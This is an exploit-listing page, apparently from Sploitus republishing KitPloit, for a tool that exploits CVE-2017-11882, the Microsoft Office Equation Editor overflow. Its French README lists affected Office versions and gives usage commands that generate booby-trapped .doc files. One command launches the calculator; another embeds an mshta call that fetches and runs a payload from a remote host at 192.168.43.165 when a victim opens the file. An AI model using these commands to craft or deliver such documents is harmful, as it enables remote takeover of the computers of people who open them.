Sploitus

Exploit for CVE-2017-11882

kitploit · 2026-08-27

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LITTLEBIN404-CVE-2017-11882
## Aperçu de CVE-2017-11882

Du point de vue de l'exploitation, il peut toucher toutes les versions d'Office de 2003 à 2016, et la mise en place de l'environnement d'attaque est très simple. Cette vulnérabilité est causée par l'[Éditeur d'équations] dans Office. Comme le processus de l'éditeur ne vérifie pas la longueur des noms, cela provoque un débordement de tampon, et un attaquant peut exécuter du code arbitraire en construisant des caractères spéciaux. Par exemple, si un pirate exploite cette vulnérabilité pour créer un fichier Office avec une backdoor shell, lorsque l'utilisateur ordinaire ouvre ce fichier, l'ordinateur peut être directement contrôlé par le pirate.

## Versions affectées :

root@kitploit:~
    
    
    office 2003 
    office 2007 
    office 2010 
    office 2013 
    office 2016
    

## Usage

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

![Image](https://raw.githubusercontent.com/littlebin404/CVE-2017-11882/master/img/1.png)

Cliquez sur le fichier "test.doc" généré, la calculatrice apparaît avec succès.

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc
    

![Image](https://raw.githubusercontent.com/littlebin404/CVE-2017-11882/master/img/2.png)